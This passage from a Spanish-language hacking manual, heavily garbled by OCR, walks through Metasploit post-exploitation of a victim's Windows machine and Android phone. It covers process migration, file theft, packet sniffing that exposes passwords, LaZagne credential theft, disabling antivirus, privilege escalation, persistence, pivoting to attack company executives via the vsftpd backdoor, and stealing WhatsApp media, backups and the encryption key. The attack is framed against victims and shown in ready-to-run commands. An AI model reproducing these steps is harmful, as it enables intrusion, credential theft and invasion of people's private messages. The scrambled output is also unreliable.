msf pest { ) > exploit 


Upgrading session ID: 1 
} Starting exploit/multi/handler 
} Started reverse TCP handler on 192.168.1.67:4433 
} Post module execution completed 





Y a los pocos segundos debería de aparecer en tu terminal esto, que significa 
que tienes un meterpreter de la máquina. 
Sending stage (179779 bytes) to 192.168.1.141 


Meterpreter session 2 opened (192.168.1.67:4433 -> 192.168.1.141:49413) at 2018-10-13 15:39:42 -0500 
Stopping exploit/multi/handler 





Una vez con el nuevo acceso, puedes confirmar la sesión con el comando 
sessions -i, e interactuar con el meterpreter con el comando sessions -i 2. 


msf post( ) > sessions -i 


Active sessions 


Id Name Type Information 
Connection 


E shell x64/windows Microsoft Windows [Versi_n 6.1.7600] Copyright (c) 2 
009 Microsoft Corporation... 192.168.1.67:4444 -> 192.168.1.141:49386 (192.168.1.141) 
meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-KAGNAUTILSB 
192.168.1.67:4433 -> 192.168.1.141:49413 (192.168.1.141) 


) > sessions -i 2 
} Starting interaction with 2... 


meterpreter > | 





Y listo, a este punto ya tienes control completo del sistema, aprenderemos 
más de post-explotación en la siguiente sección. 








POST- EXPLOTACION 


Ahora que ya aprendiste sobre cómo hacer reconocimiento, análisis de 
vulnerabilidades, y explotar diversos sistemas, tienes que aprender a dominar lo que 
sigue, que se llama post-explotación, post explotación es todo lo que le sigue, puede 
ser desde cosas sencillas como robar un archivo, activar la webcam o el micrófono, 
hasta cosas más avanzadas como pivotear, es decir, atacar a un sistema desde un 
sistema infectado. 


En esta sección aprenderás cómo realizar cada una de estas cosas, algunas de 
estos ataques ya los he mencionado anteriormente, pero las funciones más avanzadas 
como persistencia y pivoteo las veremos en esta sección. 


Otra cosa, principalmente utilizaremos Metasploit y asumiremos que tienes 
una sesión meterpreter, ya que a este punto ya sabes que, si obtienes una sesión 
powershell o shell, puedes convertirla en meterpreter relativamente fácil. 


5.1 POST-RECONOCIMIENTO LOCAL 


Antes que nada, siempre que obtenemos acceso a un sistema, lo primero que 
deberíamos hacer es realizar una etapa de reconocimiento local, es decir, dentro del 
sistema comprometido. 


Nos interesa saber información como en qué sistema estamos, usuario, que 
nivel de permisos, que IP tenemos, etc., así que hagamos eso primero. 
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5.1.1 ¿Qué sistema es? 


Para obtener que sistema es, lo mas sencillo es utilizar el comando sysinfo, 
que nos mostrara algo de la informacion del sistema como sistema operativo y 
versión de este, asi como el nombre del ordenador en donde estamos. 


meterpreter > sysinfo 
: WIN-KAGNAUTILSB 
: Windows 7 (Buiid 7680). 


Architecture 


System Language : 5 

Domain : WORKGROUP 
Logged On Users : 2 
Meterpreter : x86/windows 





5.1.2 ¿Qué usuario es? 


Para obtener el usuario en el que tenemos control, basta con utilizar el 
comando getuid, que nos mostrará el nivel de usuario en el que está corriendo el 
proceso que te da control del sistema. Esto también es muy util porque podemos saber 
si tenemos control nivel sistema o nivel usuario, por ejemplo, si estamos corriendo 
como “AUTHORITY/SYSTEM”, podemos asumir que tenemos privilegios de 
sistema. 






meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 





Mientras que un acceso nivel usuario se veria algo como lo siguiente. 


meterpreter > getuid 





Server username: WIN-KA6NAUTJLSB\WhiteSuit Hacking 


Ambos niveles de usuario tienen su función, por ejemplo, un servicio nivel 
sistema puede afectar las interfaces y realizar ciertos ataques, como los de pivote; sin 
embargo, un acceso nivel usuario podría acceder y atacar recursos a nivel usuario tal 
como los navegadores, cámaras, micrófonos, teclados de manera más fácil 


5.1.3 Procesos 


Nuestro malware está corriendo en un proceso en el sistema infectado, así 
como todos los demás programas, así que algo que nos interesa conocer son los 
procesos o programas que está corriendo el sistema, para esto, usa el comando ps. 
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Y mostrará los procesos que está corriendo el sistema, mostrándonos el PID, 
que es Process ID, el nombre del proceso, y el usuario que está utilizando ese proceso. 


Arch Session User 





Ahora, sí obtuvimos acceso a este sistema por medio de un payload, si la 
víctima cierra nuestro proceso perderíamos acceso al sistema, sin embargo, una 
forma fácil de evitar esto es migrarlos a otro proceso, para hacerlo es necesario que 
nuestro código malicioso se “cuelgue” de otro programa, para esto, utilizaremos el 
comando migrate, seguido del PID al que nos queremos migrar. 


Recuerda, tenemos que migrarnos a un proceso con el mismo usuario en el 
que estamos, en este caso me moví al proceso 2996, entonces, aunque cierren mi 
programa malicioso, no perderé control. 
meterpreter > migrate 2996 


| Migrating from 3036 to 2996... 
i Migration completed successfully. 





Puedo confirmar que sigo teniendo acceso ejecutando algunos comandos 
basicos. 


meterpreter > getuid 

Server username: WIN-KAGNAUTJLSB\WhiteSuit Hacking 
meterpreter > sysinfo 
Computer : WIN-KAGNAUTILSB 

os : Windows 7 (Build 7600). 


Architecture : x64 


System Language : es ES 
Domain : WORKGROUP 
Logged Gn Users : 2 
Meterpreter : x64/windows 





5.1.4 Dirección IP 


Y, por último, todo sistema que explotemos tiene una dirección en la red 
en la que está, es decir, una IP en su LAN, nos interesa saber cuál es esta dirección, 
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ademas de cómo está conectado, es decir, que interfaz de conexión esta usando, para 
esto podemos usar simplemente el comando ifconfig. 


meterpreter > ifconfig 


Un sistema puede tener muchas interfaces, pero la que nos interesa conocer 
es la que tenga una IP en la red LAN, y en donde dice IPv4 o IPv6 encontraremos 
la IP local. 


Interface 11 


Hardware MAC : 

MTU z 

IPv4 Address : 192.168.1.141 

IPv4 Netmask : 255.255.255.0 

IPv6 Address : fe80::fcfc:1498:6662:5b26 
IPv6 Netmask : ffff:ffff:ffff:ffff:: 





Eso es todo para el reconocimiento en post-explotación, ciertamente hay 
muchos más comandos y funciones que podamos utilizar. Te recomiendo pensar 
que más información te interesaría sacar de un sistema comprometido y encontrar la 
manera de hacerlo en Metasploit utilizando lo que has aprendido hasta ahora. 


5.2 ATAQUES AL OBJETIVO 





Ahora que conocemos un poco más del sistema al que tenemos acceso, 
empecemos a atacar, vamos a comprometer principalmente la integridad y la 
confidencialidad de la información de nuestro objetivo. 


5.2.1 Descarga de archivos 


Una vez que estamos en el meterpreter, lo primero que nos interesa es saber 
en qué ubicación en el directorio de archivos estamos, para esto, podemos usar el 
comando pwd. 


meterpreter > pwd 





C:\Windows\system32 


Ahora, nos interesa saber los archivos que están dentro de esta dirección, con 
el comando Is podemos obtener esta informacion. 
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Last modified 


2009-07-14 04:30:2 


(458E1B7327-5P- 


e-B012-9C450E187327-5P- 





Digamos que queremos ver lo que está en el escritorio, vamos a cambiarnos 
de directorio con el comando ed. 


meterpreter cd / 

meterpreter > pwd 

EN 

meterpreter > cd Users 

meterpreter > pwd 

C:\Users 

meterpreter > cd "WhiteSuit Hacking" 
meterpreter > cd Desktop 
meterpreter > pwd 

C:\Users\WhiteSuit_ HackingiDeskto 





Ahora, digamos que queremos descargar un archivo, el comando WinRAR 
nos permitirá esto. 


a > download winrar.exe 
Downloading: winrar.exe -> winrar.exe 
¿ Downloaded 1.00 MiB of 2.03 MiB (49.35% winrar.exe -> winrar.exe 
} Downloaded 2.00 MiB of 2.03 MiB (98. $ nrar.exe -> winrar.exe 
Downloaded 2.03 MiB of 2.03 MiB (100.0%): winrar.exe -> winrar.exe 
downioad : Winrar.exe -> winrar.exe 





Si queremos eliminarlo con rm podemos hacerlo. 





meterpreter > rm winrar.exe 


También podríamos subir archivos si lo deseamos, con el comando upload. 










meterpreter > upicad /root/WhiteSuitBG. png 
: uploading : /root/WhiteSuitBG.png -> WhiteSuitBG.png 
: Uploaded 2.27 MiB of 2.27 MiB (106.0%): /root/WhiteSuitBG.png -> WhiteSuitBG.png 
¿ uploaded : /root/WhiteSuítBG.png -> WhiteSuitBG.png 
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5.2.2 Sniffer 


Ahora imaginemos que lo que queremos realmente es interceptar las 
conexiones que hace esta maquina en su red, para poder interceptar paquetes en esta, 
para esto, podemos plantar un sniffer en el sistema, con el comando load sniffer. 


meterpreter > load sniffer 





Loading extension sniffer...Success. 


Ahora nos interesa saber que interfaces de red podemos utilizar para 
interceptar las conexiones del sistema, para esto, utilizaremos el comando sniffer_ 
interfaces. 


Nota que solo una de ellas tiene DHCP, es decir, IP en la red, esa es la que 
nos interesa utilizar. 


meterpreter > sniffer interfaces 


- 'WAN Miniport (Network Monitor)’ ype:3 mtu:1514 usabie:true dhcp:false wifi:false ) 


{ type:® mtu:1514 usable:true dhcp:true wifi:faise ) 


1 (ty 
2 - 'Conexifín de red Intel(R) PRO/1009 MT 





Ahora iniciaremos la intercepción de paquetes, recuerda, el sniffer guardará 
todos los paquetes que pasen por esa interfaz, para hacer esto, utilizaremos el 
comando con el formato sniffer_start <número de interfaz> <número de paquetes 
a guardar> 


ffer_start -h 





art [interface-id] [; et-buffer (1-200900)3 [bpf fii 


En este caso, digamos que queremos interceptar 2000 paquetes en la interfaz 
dos, el comando que utilizaremos será sniffer_start 2 2000 


meterpret 





¿ Capture 


Para ver el estatus de cuantos paquetes hemos interceptado, puedes utilizar 
el comando sniffer_stats <número de interfaz>, en este caso sería sniffer_stats 2. 





Ahora, para descargar estos paquetes, el comando es sniffer_dump <número 
de interfaz> </dirección/archivo.pcap>. 
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En este caso, si quiero guardar el archivo en mi escritorio, el comando será 
sniffer_dump 2 /root/Desktop/sniffer.pcap 


sniffer.pcap 





Ahora detengamos el sniffer con el comando sniffer_stop <número de 
interfaz>, es decir, sniffer_stop 2. 





Listo, a este punto tenemos todas las conexiones que hizo la máquina desde 
que iniciamos el sniffer (limitado a 2000 paquetes). Para abrirlo, simplemente 
abrimos el archivo pcap en WireShark. 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 





354 $6081 5 
54 49347 ~ 8609 [ACK] Seq=i Ack=1 Win=16249 Len=8 

192.188. 385 54915 ~ 54915 Len=263 
192. 1.1 54 49348 — 8089 [ACK] Seg=1 Ack=1 Win=16366 Len=9 
172. sit. 1392 61973 -~ 443 Len=1256 = 
172.217.11. 1392 61973 ~ 443 Len=1350 
172,217.11. 1392 61973 ~ 443 Len=1358 
172.217.11. 1392 61973 ~ 443 Len=1358 
172,217.11. 1392 61973 — 443 Len=1258 
172. „ii. 1392 61973 — 443 Len=1350 
172.217.11. 1392 61973 ~ 443 Len=1358 
12 9.600906 172.217.121. 138 61973 ~ 443 Len=96 
13 9.000998 192.168.1.. 94 51735 — 58898 Len=52 
14 0.069958 .11.174 192.168. 84 443 — 61973 Len=22 
15 0.000009 74.125.195.189 192.168.1. 1392 443 ~ 53261 Len=1358 
16 9.609999 74.125,195.189 192.168. 557 443 ~ 53261 Len=515 
17 9.600996 192.188.1.83 74.125.195.189 71 53261 — 443 Len=29 
18 6.eesese Viware_be:d4:77 3 42 Who has 192.168.2.68? Tell 192.168.1.141 
19 0.069050 Vaware_53:bé:c8 = 69 192.168.1.68 is at 09:80:29:53:b6:0c8 
20 9.000900 172.217.11.174 . ds 352 443 ~ 61973 Len=318 
21 9.600905 112.217.11.174 -168.1- 69 443 — 61973 Len=18 
22 0.009990 192.168.1.83 172.217.11. 72 61973 ~ 443 Len=38 


5 0.069050 
6 0.062090 
7 9.800998 
8 9.000906 
9 8.000098 
10 0.0689958 
11 0.088998 


NRRRROORBR RoR 


iy 
3 
g 
le 
8 


25 9.600928 Vaware_53:06:08 Vamare_be:d4:77 68 Who has 192.168.1.1417 Tell 192.168,1.68 

26 6.699008 Vamare_be:d4:77 Viware_53:b6:08 42 192.1658.1.141 is at 80:00:29:be:d4:77 

27 6.000098 197:188.1.83 192.188.1.187 171 38587 = 8809 [PSH, ACK] Seg=1 Ack=1 Win=254 Len=117 [TCP segsent of a reas & 
197-188-1-187 192.168-1.83 171 RAAG — 385A7 [PSH ACKÍ Sen=1 Ack=31A Win=858 len=117 [ICP senment of a caer fg 


y e (3712 bits), 464 bytes captured (3712 bits) z $ 
Ethernet 11, Src: ec Ad:af:28 (d8:37:be:4d:af:28}, Dst: Micro-St_7f:7f:ee (4c:cc:6a:7f:7f:ee} 
Internet Protocol Yersion 4, Sri 192.168.1.254, Ost: 192.168.1.83 
User Datagram Protocol, Src Port: 48881, Dst Port: 56386 
Data (422 bytes) 


ca 





Packets: 2000 - Displayed: 2000 (100.0%) 
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Aqui podremos ver desde que hizo la persona en cuanto a redes, hasta 
credenciales o archivos que se hayan mandado sin estar encriptados. 





Ethernet II, Src: Sa:6c:06:fa:1b:f2 (Da:6c:96:fa:1b:f2), Ost: 0a:6f:94:56:c9:1b (Sa: 
Dst: HEN ; 


Value: AQ1175790ssf 


Form item:i "password" = "22ryu” 


Key: password 
Value: 22ryu 

Form item: “login” = “Login” 
Key: login 
Value: Login 

Form item: “action” = “login” 
Key: action 
Value: login 

Form item: “new_loc™ = 
Key: new_loc 
Value: 





5.2.3 Robo de credenciales de navegadores y otros programas remotamente 


Adicionalmente, una de las cosas que nos interesa robar, serían las 
credenciales de distintos programas de un sistema, por ejemplo, navegadores, apps 
(como Outlook), y credenciales de redes wifi, para hacer esto, podemos combinar 
nuestra conexión meterpreter con el programa LaZagne, un script escrito en Python 
originalmente diseñado para uso forense, que está compilado para Windows (también 
tiene versión para Macintosh y Linux) y lo podemos ejecutar remotamente. 


Lalimitantecon este programaes que solo funcionacon credenciales guardadas 
en el navegador, y no encriptadas (Windows no las encripta automáticamente, el 
usuario tendría que instalar un software adicional para ello, lo cual es poco común). 


Primero, ubiquemos el programa en nuestro sistema Kali, que está en la ruta 
/opt/Explotacion/lazagne/windows, y entraran a esa ruta con el comando ed. 


Podemos confirmar que está el programa con el comando ls. 


:/$ cd /opt/Explotacion/lazagne 


lazaghe.exe 





Ahora utilizaremos meterpreter para subirlo a el sistema comprometido con 
el comando upload. 
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Siel sistema en el que estas tiene antivirus, puedes deshabilitar manualmente 
cambiando el archivo de instalación del antivirus, o deshabilitar el de Windows con 
el módulo de post-explotación killav, puedes encontrarlo con el comando search. 


Ahora subiremos el ejecutable de LaZagne. 


} uploading 7E> tacion; g i Zagne.ex Lazagne.exe 
Uploaded 8.00 I {45.51%}: plotacion/lazagne/windows/lazagne.exe -> 
lazagne.e 


ploaded 16.00 MiB of 17.58 MiB (91.02%): /opt/Explotacion/lazagne/windows/lazagne.exe - 


.58 MiB (100.0%): /opt/Explotacion/lazagne/windows/lazagne.exe -> 





azagne/windows/iazagne.exe -> lazagne.exe 


Una vez que esté en el sistema ya podemos utilizarlo, pero este programa 
se utiliza por medio de una consola de comandos, es decir, una shell, usaremos el 
comando shell para abrir una shell remota en el sistema. 


ion. Reservados todos los derechos. 


C:\Users\WhiteSuit HackinglDownloads>] 





Ahora que ya tenemos una shell, ya podemos ejecutar el programa, para 
hacerlo, basta con escribir lazagne.exe all, esto robará todas las credenciales que 
encuentre en el sistema. 


C:\Users\whi 


LaZagne Pr 


! BANG BANG ! 





Como puedes ver, ahora robó las credenciales de Facebook del navegador 
Chrome. 


Podemos especificar exactamente qué queremos robar del sistema con 
alguna de las opciones adicionales de LaZagne. 
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usage: lazagne.exe [-h] [--version] 
{chats,svn,ail,wifi,mails,windows , database, sysadmin, browsers, games} 


positional arguments: 
{chats,svn,alil,wifi,mails ,windows , database, sysadmin, browsers, games} 
Choose a main command 
chats Run chats module 
svn Run svn module 
all Run all moduies 
wifi Run wifi module 
mails Run mails module 
windows Run windows module 
database Run database module 
sysadmin Run sysadmin module 
browsers Run browsers module 
games Run games module 


optional arguments: 
-h, --help show this help message and exit 
--version laZagne version 





5.3 DESACTIVAR ANTIVIRUS 


Para desactivar un antivirus en un sistema, existen varias formas dependiendo 
del antivirus, una de las formas mas sencillas para desactivar uno es con el comando 
run killav en meterpreter. 


meterpreter > run killav 


[i] Meterpreter scripts are deprecated. Try post/window nage/killav. 
[!3 Example: run post/windows/manage/killav OPTION=value [...] 
} Killing Antivirus services on the target... 





5.4 ELEVACIÓN DE PRIVILEGIOS 


Hay ocasiones en las que necesitamos realizar actividades en un sistema 
comprometido, como por ejemplo interactuar con partes del sistema no accesibles 
para un usuario, así que podemos utilizar técnicas para obtener esta elevación de 
privilegios. 


5.4.1 Getsystem 


La primera forma es la más sencilla, aunque altamente efectiva, que es usando 
el comando getsystem en un meterpreter, que intentara con varias técnicas obtener 
privilegios elevados en un sistema en el que tenemos privilegios nivel usuario. 
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Para usarlo, corre el comando getysystem en el meterpreter. 





Ahora podrás confirmar que tienes privilegios elevados con el comando 
getuid, en donde deberías aparecer como el usuario sistema. 


meterpreter > getuid 


Server username: NT AUTHORITYASYSTEM 





5.4.2 Elevación privilegios Android 


La elevación de privilegios en Android es bastante sencilla, basta con obtener 
una shell con la palabra reservada shell, y luego pedir privilegios de superusuario 
con la palabra clave su, recuerda que esto solo funciona si el Android tiene root. 





5.5 PERSISTENCIA 


La persistencia es el utilizar el software malicioso en un sistema para generar 
un acceso perpetuo al sistema, sin importar si se reinicia este o si se cierra el proceso, 
hacer que el proceso simplemente se reinicie automáticamente. 


Para hacer esto, podemos utilizar scripts de persistencia para generar 
un ejecutable automáticamente al iniciar un sistema, sin embargo, usualmente 
requerimos un privilegio elevado, especialmente en sistemas como Android. 


5.5.1 Windows 


En Windows, es relativamente sencillo obtener persistencia en muchas 
versiones del sistema, utilizando el comando dentro de meterpreter run persistence, 
podemos utilizar diferentes banderas para elegir como generar la persistencia. 


Primero vamos a correr el comando run persistence -help para ver las 
opciones que tenemos. 
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Aqui tenemos una explicación bastante decente de las opciones que podemos 
utilizar para la persistencia, recomiendo que leas estas opciones, pero las opciones 
que nos interesan en este momento serian la -A, para generar un escuchador al 
mismo tiempo, la -L, para decirle que se grabe en el disco duro del sistema principal 
el código malicioso, y la -X, para que cada vez que el sistema se prenda, nos dé una 
conexión, e intente hacer esa conexión cada 30 segundos, obviamente podríamos 
agregar otras opciones como agregar conexiones a otras máquinas, o que se inicie 
con que el usuario inicie sesión, pero por ahora estos comandos son los principales, 
esto haría que el comando quede así: 


run persistence -A -L c:\\ -X 30 


Adicionalmente, si quisiéramos permisos elevados desde el inicio, le 
agregaríamos una -S. 





Listo, a este punto ya se ejecutó el script, pero realmente no ha funcionado, 
pero si esperamos un segundo, deberíamos obtener una sesión adicional, esa es la 
prueba de que se ejecutó correctamente, y funciono también correctamente el script. 
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Vamos a probar si funciona el script reiniciando el sistema con el comando 
reboot. También iniciaremos un escuchador en el puerto 4444 que es a donde apunta 
la persistencia. 


Payload Payload opts 


meterpreter/reverse tcp tcp: 2 .1.68:4444 





Ahora que se inicie el sistema Windows. 
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5.6 PIVOTEO - ATACANDO DESDE SISTEMA COMPROMETIDO 





Ahora vamos a aprender a “pivotear”, esto es atacar un sistema por medio de 
un sistema comprometido. 


Imagínate que quieres hackear a los directivos de la compañía X, sin embargo, 
en esta compañía, los directivos están altamente entrenados, así que un ataque por 
ingeniería social no es viable, y están tras una red protegida por un firewall, sin 
embargo, sabes que trabaja un becario como asistente de uno de estos ejecutivos, y 
que no está bien entrenado, así que logras obtener acceso al sistema del asistente. 


A pesar de que lograste un acceso, realmente no obtienes nada importante, 
ya que los archivos importantes están en las máquinas, servidores, y redes de la 
organización, así que tu única forma es utilizar a esta máquina infectada para atacar 
a los demás sistemas. 


5.6.1 Reconocimiento 


Para esta práctica asumimos que tienes un meterpreter en un sistema 
Windows (esto se puede hacer en otros SO, pero para el ejemplo utilizaré un sistema 
Windows comprometido). 


Vamos a seguir aplicando la metodología incluso en esta etapa de post 
explotación, lo primero que me interesa saber, es quien más, o que otros sistemas, 
son accesibles por mi sistema comprometido, es decir, mi “pivote” en la red. 


Para esto, lo primero que conviene hacer, es un escaneo ARP, por medio 
del script en Metasploit run arp_scanner al darle el parámetro -help, nos da las 
opciones que tenemos como argumentos. 


meterpreter > FE nner -help 
Meterpreter for performing an ARPS Scan Discovery. 


e target address 
Save found IP Addresses t 





Ahora que tenemos los argumentos, vamos a utilizar el comando, run arp_ 
scanner -r 192.168.1.141/24, ya que 192.168.1.141 es la IP de la máquina infectada, 
y el /24 le dice que escanee todo el segmento de red. 


Tras este escaneo, sabremos cuantas, y cuales sistemas estan conectados a 
la red, no sabemos realmente el tipo de sistema que es, pero minimo ya tenemos 
visibilidad de cuantos sistemas existen en la red, sus IPs, y sus direcciones MAC. 
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meterpreter > run arp scanner -r 192.168.1.141/24 
ARP Scanning 192.168.1.141/24 

=} IP: 192.168. 

} IP: 192.168. 

} IP: 192.168. 

d IP: 192.168. 

SP P= 192.168. 


.71 MAC 70:47:57: 
-68 MAC 00:0c:29: 
.73 MAC 30:07:4d: 
.83 MAC 4c: 

-79 MAC 08: 

.93 MAC 70: 

.101 MAC 


1 
1 
iÈ 
1 
1 
IP: 192.168.1 
IP: 192.168.1 
IP: 192.168.1.115 MAC 
IP: 192.168.1.128 MAC 
IP: 192.168.1.141 MAC 
IP: 192.168.1.171 MAC 
IP: 192.168.1.166 MAC 
IP: 192.168.1.165 MAC 
IP: 192.168.1.176 MAC 
IP: 192.168.1.187 MAC 
IP: 192.168.1.188 MAC 
IP: 192.168.1.255 MAC 
IP: 192.168.1.254 MAC 





Ahora, algo importante, es que estamos utilizando paquetes ARP porque son 
mas dificiles de detectar y pasan por un firewall mas facilmente, si intentaras hacer 
esto con por ejemplo nmap, probablemente no pasaría ningún paquete a la red. 


5.6.2 Interceptando paquetes en redes externas 


Normalmente es imposible realizar ataques de hombre en medio (MITM) 
en redes externas a la nuestra, sin embargo, una vez que tenemos un pivote (sistema 
comprometido) en la red, se nos abre esta posibilidad utilizando la técnica de 
envenenamiento ARP. 


Para hacer esto desde el pivote, utilizaremos el comando run autoroute, 
puedes ver las opciones si corres el comando con el argumento -help. 


meterpreter > run autoroute -help 


[+] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. 
post/multi/manage/autoroute OPTION=vaiue [...] 
autoroute [-r] -s subnet -n netmask 


autoroute -s 10.1.1.0 -n 255.255.255.0 
autoroute -s 10.106.10.1 
} autoroute 19.10.10.1/24 
autoroute -{ Print active routing table 
autoroute -s 16.16.16.1 Deletes the 10.10.10.1/255.255,255.0 route 
¡ Use the "route" and “ipconfig* Meterpreter commands to learn about available routes 
Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module 


Add a route to 10.10.10.1/255.2 
Netmask defaults to 255.255.255. 
CIDR notation is also okay 


55. 


5.259329 
0 


# 
# 
# 
# 
# 





Como ya sabemos los segmentos de red que queremos interceptar, vamos 
a utilizarlos, con el comando run autoroute -s 192.168.1.141/24, esto hara que 
todos los paquetes pasen por la interfaz del sistema comprometido, ahora, para de 
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hecho interceptar y ver estos paquetes, basta con regresarnos a una lección anterior 
e instalar un sniffer en el sistema comprometido, descargarlo, y analizar el archivo 
en WireShark, con esto podemos obtener que sistema es el que nos interesa atacar y 
que tipo de sistema es. 


Regrésate a la lección de sniffer en post-explotación para hacer eso. 


meterpreter > run autoroute -s 192.168.1.141/24 


[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. 
[!] Example: run post/multi/manage/autoroute OPTION=value [...] 


Adding a route to 192.168.1.141/255.255.255.0... 
3 Added route to 192.168.1.141/255.255.255.6 via 192.168.1.141 
Use the -p option to list ali active routes 





Genial, ahora no solo obtendrás los paquetes de la máquina comprometida si 
instalas un sniffer, si no los paquetes de toda la red. 


5.6.3 Atacando a otro sistema 


Ahora, vamos a asumir que en tu análisis llegaste a la conclusión que el 
sistema que quieres comprometer tiene la IP 192.168. 1.130 y es un sistema Linux el 
cual esa versión en particular es vulnerable a una falla en FTP. 


Vamos a atacarlo por el exploit en Metasploit, usa el comando background, 
y el exploit para esta vulnerabilidad que se encuentra en: 


exploit/unix/ftp/vsftpd_234_backdoor 


Y configurarlo para atacar a la IP del objetivo. 


meterpreter > background 

>} Backgrounding session 1... 
msf exploit( ) > use 
msf expioit( 


Module options (exploit/unix/ftp/ 
Name Current Setting Re 


RHOST 1 g 
RPORT 2 p he target port (TCP) 


Exploit target: 


Id Name 


O Automatic 


msf exploit ( ) > set RHOST 192.168.1.130 
RHOST => 192.168.1.130 
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Ahora inicia el ataque con el comando exploit, nota como el ataque se está 
realizando a través del meterpreter en la sesión 1 (el pivote), esto te lo puede decir 
la terminal directamente con un “via the meterpreter”, o al mostrarte las conexiones, 
que como podrás notar, tiene la conexión a mi IP (la 68), a través de la IP del pivote 
(la 141). 


msf expioití ) > exploit 


} 192.168.1.130 - Banner: 226 (vsFTPd 2.3.4) 
192.168.1.130:21 - USER: 331 Please speci the password. 


192.168.1.136 - Backdoor service has been spawned, handling... 

192.168.1.130 - UID: uid=0(root) gid=0(rooct) 

Found shell. 
i*} Command she ssion 2 opened :(192.168.1.68-192.168.1.141:0: -> 192.168.1.130:6200) at 2018-10-18 
08:12:15 -0590 





Una vez en el sistema, ya podremos comprometer la seguridad de la 
información, en este caso a través de una shell, pero si fuera un diferente payload, 
bien pudo haber sido un meterpreter, o puedes pasar la shell a meterpreter como 
vimos hace unas páginas. 





5.7 HACKEANDO WHATSAPP 


Hackear WhatsApp de un Android, aunque bien es posible, no es del todo 
fácil, para hacer esto, primero tenemos que entender una cosa, no estamos hackeando 
WhatsApp, lo que estamos hackeando realmente es el respaldo de las conversaciones 
que hace WhatsApp, y, aunque bien estas están encriptadas en el móvil con el 
protocolo (al momento) erypt12, existe una forma de obtener la llave, ya que se 
guarda en el mismo dispositivo, sin embargo, para obtener esta llave, necesitamos 
un acceso root. 


Aun así, esto solo es necesario con las conversaciones, ya que los archivos 
y multimedia como fotos, imágenes y audios, se almacenan sin ningún tipo de 
encriptación. 
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Primero, vamos a descargar archivos de WhatsApp que no estan encriptados, 
para esto, vete a la carpeta donde esta almacenado WhatsApp, por defecto esta en / 
sdcard/WhatsA pp. 










meterpreter > c 
meterpreter > pwd 
ated/tegacy/WhatsApp 


/sdcard/WnatsApp 


Y con Is podemos ver las distintas carpetas en este directorio, por el momento, 
seleccionaremos la de Media, luego regresaremos a la otra. 


ae > ts 


Name 
9 2618-67-29 23:46:39 -0500 .Shared 
40667 / rw- rw- rwx 9 ir 2018-10-16 22: 2 -0500 
40666/ rw- rw-rw- - i 2018-10-16 02 O -0500 
40666/ rvi- rw-rw- : i 2018-62-16 11:11:18 -8600 





Como podrás notar, dentro de la carpeta de Media hay varias carpetas 
referentes a imágenes y demás archivos multimedia. 


meterpreter > cd Media 
meterpreter > ls 
i /storage/emulated 


Mode 


2618-16-12 
2017-10-27 2 


2018-07-30 


2018-07-38 01:56: I 

2018-07-30 J021? 00 ao 

2018-07-30 :57:16 -0500 WhatsApp Ima 
2817-10-27 W F 
2018-02-16 

2018-07-36 

2018-07-29 23:39:30 -0500 WhatsApp Voice Notes 





Digamos que queremos descargar una /magen, basta con ir a la carpeta 
WhatsApp Images con cd “WhatsApp Images”, y elegir la imagen a descargar. 


NOTA 


Las comillas son necesarios al ingresar a una carpeta con un espacio entre de dos 
palabras. 
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meterpreter > cd "WhatsApp Images" 
meterpreter > is 


Listing: rage/emulated/legacy/WhatsApp/Media/WhatsApp Imag 


Size Type Last modi 

258972 fil 2018-07-30 61 
88397 fil 2018-07-30 601: 
55661 fit 2018-07-30 01: 


57:16 -0500 IMG-20150411-WAGO11. jpg 
56:52 -0500 IMG-20150429-WAG014.j 
56:11 -0500 IMG-20150602-WAGOG3.j 





Ahora, para descargar cualquier imagen, solo usa el comando download 
seguido del nombre de la imagen. 


meterpreter > download IMG-20150411-WAQG11.jpg 
3 Downloading: IMG-20150411-WA0011.jpg -> IMG-20150411-WAG011.jpg 
} Downloaded 252.90 KiB of 252.90 KiB (106.0%): IMG-20150411-WA6011.jpg -> IMG-20150411-WA0011.jpg 
*} download : IMG-20150411-WAOG11.jpg -> IMG-20150411-WAGO11. jpg 





Seguido de esto, la imagen se habra descargado en tu sistema. 


IMG-20150411- 
WA0011.jpg 





Ahora viene lo difícil, las conversaciones, para esto, vas a regresar a la 
carpeta WhatsApp, y ahora ingresar a la carpeta Databases. 


Aqui están todos los respaldos de WhatsApp del sistema, sin embargo, como 
notaras, tienen la terminación erypt12, nos encargaremos de eso luego, por ahora, 
descarga el archivo con el comando download. 


meterpreter > pwd 
/storage/emulated/legacy/WhatsApp 
meterpreter > cd Databases 


Type ifi Name 
100666/rw-rw-rw- 115048 fil 08 02:00:00 -0500 msgstore-2018-16-69.1. crypti2 
108666/ 115648 fil 2018-10-09 2:00:06 -0500 msgstore-2018-10-10.1.db.crypt12 
115047 fil 2618-10-16 02:00: 05 msgstore-2018-10-11.1.db.crypt12 
115049 fil 2018-10-11 92: $ msgstore-2018-16-15.1. crypt12 
115046 fil 2018-10-15 02:00:08 -05€ msgstore-2018-16-16.1. crypt12 
100660/rvw-rw-rw- 115047 fil 2018-10-16 02:00: 596 msgstore.db.crypt12 


meterpreter > d cad msgstore.db.crypt12 

i msgstore.db.cryptl2 -> msgstore.db.crypt12 
loaded 112.35 KiB of 112.35 KiB (160.0% sgstore.db.cryptl2 -> msgstore.db.cryptl2 
oad : msgstore.db.crypt12 -> msgstore.db.crypt12 
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Ahora, viene lo difícil, primero, confirmamos que estamos en un móvil con 
root, para esto, correremos el comando check_root. 


meterpreter > check root 


[+] Device is rooted 





Si no está rooteado, no podrás obtener acceso a la llave, ahí tienes dos 
opciones, o encuentras forma de obtener root, ya sea con un exploit o ingeniería 
social, o atacas a algún sistema en la nube como iCloud o Google drive donde esté 
el respaldo. 


Como el sistema está rooteado, proseguiremos, vamos a obtener una shell 
con dicho comando, una vez en la shell, pediremos permiso de superusuario con el 
comando su. 


meterpreter > shell 
Process 8 created. 

Channel 13 created. 
Su 






Ahora, a buscar la llave, por defecto, esta guardada en la carpeta /data/data/ 
files/com.whatsapp/files/ 


cd /data/data/com.whatsapp/files/ 





Ahora, viendo los archivos con ls, podemos notar que aquí esta lo que 
buscamos, el archivo key. 


ls 

Avatars 

Logs 

invalid numbers 
key 


login failed 


statistics 
vam. wam 





Sin embargo, no podemos descargar nada desde una shell, y no podemos 
acceder a ese directorio desde un meterpreter, así que tendremos que copiar la llave 
